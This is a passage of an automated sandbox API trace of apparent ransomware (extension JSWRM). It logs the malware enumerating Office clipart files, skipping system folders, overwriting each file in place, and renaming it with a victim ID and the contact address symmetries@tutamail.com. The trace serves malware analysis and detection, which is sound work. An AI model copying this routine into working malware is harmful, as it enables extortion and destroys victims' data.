lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0241781.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0088.602] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0088.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.602] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241781.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241781.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.602] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1970) returned 1 [0088.602] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.602] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7b0) returned 0x20c6c0 [0088.603] ReadFile (in: hFile=0x314, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x7b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x7b0, lpOverlapped=0x0) returned 1 [0088.604] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.604] WriteFile (in: hFile=0x314, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x7b0, lpOverlapped=0x0) returned 1 [0088.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0088.604] CloseHandle (hObject=0x314) returned 1 [0088.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0088.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.604] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0088.604] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0088.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0088.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0088.605] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0088.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0088.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0088.605] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241781.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241781.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241781.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241781.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0088.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0088.605] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.605] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf34834b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf34834b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf36e46d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7938, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0250504.WMF", cAlternateFileName="")) returned 1 [0088.606] lstrcmpiW (lpString1="J0250504.WMF", lpString2=".") returned 1 [0088.606] lstrcmpiW (lpString1="J0250504.WMF", lpString2="..") returned 1 [0088.606] lstrcmpiW (lpString1="J0250504.WMF", lpString2="...") returned 1 [0088.606] lstrcmpiW (lpString1="J0250504.WMF", lpString2="windows") returned -1 [0088.606] lstrcmpiW (lpString1="J0250504.WMF", lpString2="recovery") returned -1 [0088.606] lstrcmpiW (lpString1="J0250504.WMF", lpString2="perflogs") returned -1 [0088.606] lstrcmpiW (lpString1="J0250504.WMF", lpString2="documents and settings") returned 1 [0088.606] lstrcmpiW (lpString1="J0250504.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.606] lstrcmpiW (lpString1="J0250504.WMF", lpString2="system volume information") returned -1 [0088.606] lstrcmpiW (lpString1="J0250504.WMF", lpString2="msocache") returned -1 [0088.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0250504.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0250504.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0250504.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0250504.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0250504.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0250504.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0088.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.606] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.606] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.606] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250504.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.607] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=31032) returned 1 [0088.607] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7930) returned 0x24d210 [0088.607] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7930, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7930, lpOverlapped=0x0) returned 1 [0088.611] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.611] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7930, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7930, lpOverlapped=0x0) returned 1 [0088.611] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.612] CloseHandle (hObject=0x314) returned 1 [0088.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0088.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0088.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.612] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0088.612] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0088.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0088.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0088.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.613] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250504.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250504.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250504.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250504.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0088.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0088.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0088.613] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf2fbd2e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf2fbd2e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf34834b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6958, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0250997.WMF", cAlternateFileName="")) returned 1 [0088.613] lstrcmpiW (lpString1="J0250997.WMF", lpString2=".") returned 1 [0088.613] lstrcmpiW (lpString1="J0250997.WMF", lpString2="..") returned 1 [0088.613] lstrcmpiW (lpString1="J0250997.WMF", lpString2="...") returned 1 [0088.613] lstrcmpiW (lpString1="J0250997.WMF", lpString2="windows") returned -1 [0088.613] lstrcmpiW (lpString1="J0250997.WMF", lpString2="recovery") returned -1 [0088.614] lstrcmpiW (lpString1="J0250997.WMF", lpString2="perflogs") returned -1 [0088.614] lstrcmpiW (lpString1="J0250997.WMF", lpString2="documents and settings") returned 1 [0088.614] lstrcmpiW (lpString1="J0250997.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.614] lstrcmpiW (lpString1="J0250997.WMF", lpString2="system volume information") returned -1 [0088.614] lstrcmpiW (lpString1="J0250997.WMF", lpString2="msocache") returned -1 [0088.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0250997.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0250997.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0250997.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0088.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0250997.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0250997.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0250997.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0088.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0088.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0088.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250997.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250997.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.615] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=26968) returned 1 [0088.615] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.615] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6950) returned 0x24d210 [0088.616] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6950, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6950, lpOverlapped=0x0) returned 1 [0088.619] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.619] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6950, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6950, lpOverlapped=0x0) returned 1 [0088.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.620] CloseHandle (hObject=0x314) returned 1 [0088.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0088.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0088.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0088.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0088.620] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0088.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0088.620] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.620] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250997.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250997.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0250997.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0250997.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0088.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0088.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0088.621] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xed05f07, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xed05f07, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf34834b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1100c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0251007.WMF", cAlternateFileName="")) returned 1 [0088.621] lstrcmpiW (lpString1="J0251007.WMF", lpString2=".") returned 1 [0088.621] lstrcmpiW (lpString1="J0251007.WMF", lpString2="..") returned 1 [0088.621] lstrcmpiW (lpString1="J0251007.WMF", lpString2="...") returned 1 [0088.621] lstrcmpiW (lpString1="J0251007.WMF", lpString2="windows") returned -1 [0088.621] lstrcmpiW (lpString1="J0251007.WMF", lpString2="recovery") returned -1 [0088.621] lstrcmpiW (lpString1="J0251007.WMF", lpString2="perflogs") returned -1 [0088.621] lstrcmpiW (lpString1="J0251007.WMF", lpString2="documents and settings") returned 1 [0088.621] lstrcmpiW (lpString1="J0251007.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.621] lstrcmpiW (lpString1="J0251007.WMF", lpString2="system volume information") returned -1 [0088.621] lstrcmpiW (lpString1="J0251007.WMF", lpString2="msocache") returned -1 [0088.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0088.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0251007.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0251007.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0251007.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0088.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0088.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0251007.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0251007.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0251007.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0088.621] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0088.621] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0088.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.622] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0088.622] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0251007.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0251007.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.622] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=69644) returned 1 [0088.622] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.622] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x24d210 [0088.622] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x11000, lpOverlapped=0x0) returned 1 [0088.628] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 